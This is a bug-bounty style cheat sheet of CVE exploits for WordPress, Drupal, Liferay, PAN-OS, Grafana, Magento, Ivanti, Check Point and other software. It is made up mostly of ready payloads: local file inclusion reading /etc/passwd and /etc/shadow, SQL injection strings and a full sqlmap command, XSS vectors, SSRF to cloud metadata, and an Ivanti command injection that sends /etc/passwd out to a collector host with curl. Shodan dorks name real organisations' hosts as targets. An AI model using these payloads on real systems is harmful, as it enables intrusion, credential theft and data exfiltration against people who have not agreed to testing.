💎My CVE Approach
WordPress and Plugins CVE
WooCommerce plugin allows LFI!
02: Capture request in Burp
03: Change request method to POST and add:
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1
04: Also add:
action=woof_text_search&
05: That's it! You get local files.
-------------------------------------------------
CMS Technology-Based CVE
Tomcat: /manager/tomcat /..;/
Drupal CMS:
/core/install.php
/install.php
Admin panel takeover
POC: cat ip.txt | while read host; do for path in /install.php /core/install.php; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title | grep "Choose language"
Prestashop CMS module
POC: curl -v 'https://localhost/modules/appagebuilder/apajax.php?leoajax=1&product_manufacture=1,1)+or+sleep(4)%23--'
https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
Liferay CMS Portal RXSS - CVE-2025-4388
https://medium.com/@tsxninja2004/rxss-on-mercedes-benz-71a839da2d31
Shodan: Hostname:"nokia.com" html:"liferayPortalCSS"
Exploit URL: /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
Liferay Portal/DXP Reflected XSS in Blogs Web - CVE-2025-4576
template: https://github.com/projectdiscovery/nuclei-templates/issues/12862
Shodan: Hostname:"nokia.com" html:"liferayPortalCSS"
Exploit URL: /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageCaption=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"
Palo Alto Networks PAN-OS - (XSS) vulnerability - CVE-2025-0133
https://ch4ndan.medium.com/how-i-found-xss-cve-2025-0133-using-shodan-39a37eae7807
Shodan: hostname:target.com os:"PAN-OS"
Exploit URL: /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
Palo Alto Networks PAN-OS: OS Command Injection in GlobalProtect - CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE20243400.yaml
Grafana Path Traversal - CVE-2025-4123
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
POC:
Open Redirect URL: http://103.175.2.234:30000/public/..%2F%5Cevil.com%2F%3f%2F..%2F..
SSRF URL: http://103.175.2.234:30000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
LFI URL: http://103.175.2.234:30000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
XSS URL: http://103.175.2.234:30000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Magento CMS - SQL injection -CVE-2019-8130
https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
sqlmap -u 'http://db.novapay.com:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=' -p "ids[0][product_id][to]" --prefix=")))" --suffix=" -- -" --technique=BT --ignore-code=400 --level=5 --risk=3 --no-cast --batch
Minio Console - CVE-2023-28432
https://github.com/acheiii/CVE-2023-28432
POC:
POST /minio/bootstrap/v1/verify HTTP/1.1
TYPO3 CMS: ?type=* parameter is vulnerable to SQL injection
Payload ; -1+OR+3 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW2 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW1=6 +AND+000762=000762
WordPress CMS:
https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
Mura CMS:
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS?tab=readme-ov-file
Adobe Experience Manager:
1) XSS via the childrenlist selector in AEM, POC:
/sdfsdf.childrenlist.html
/sdfsdf.childrenlist.sdfsdf.html
/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
/seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html
/etc/designs/xh1x.childrenlist.json//<img src=x onerror=alert(origin)>.html
/xh1x.childrenlist.json//%3Csvg%20onload=alert('XSS')%3E.htmlxx
/etc/designs/xh1x.childrenlist.json
Wayback URL Grep CVE
cPanel RXSS CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
------------
JIRA Information Disclosure Endpoint:
cat endpoint.txt | grep "secure" | grep "jspa"
cat endpoint.txt | grep "jira"
Endpoint: /secure/QueryComponent!Default.jspa
------------
CVE-2023-25157 - GeoServer SQL Injection
https://github.com/win3zz/CVE-2023-25157
cat endpoint.txt | grep '/geoserver/ows/'
geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=layername&CQL_FILTER=1=1;SELECT version()--
------------
SQL Injection
cat endpoint.txt | grep '?id='
Payload : if(now()=sysdate(),SLEEP(8),0)
------------
GANGLIA RXSS:
cat endpoint.txt | grep ganglia
cat endpoint.txt | grep graph_all_periods.php
Vulnerable Parameter: h
Payload: ')"><img src=0 onerror=prompt();>
------------
Keycloak Endpoint
Keycloak 10.0.0 to 18.0.0 have a POST-based XSS vulnerability at the endpoints:
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect
cat endpoint.txt | grep "keycloak"
cat endpoint.txt | grep "/realms/master"
Shodan search CVE
CVE-2024-24919 LFI - Path Traversal
shodan http.html:"Check Point ssl network" ssl:"target"
POST /clients/MyCRL HTTP/1.1
Host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
====================================
IVANTI
shodan title:"Ivanti Connect" hostname:"target.*"
POC: https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
https://github.com/h4x0r-dz/CVE-2024-21893.py
====================================
CVE-2024-27348 (RCE) - Unauthenticated users can execute commands via Groovy injection in Apache HugeGraph-Server.
Fix: Upgrade to version 1.3.0
POC: https://github.com/Zeyad-Azima/CVE-2024-27348
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"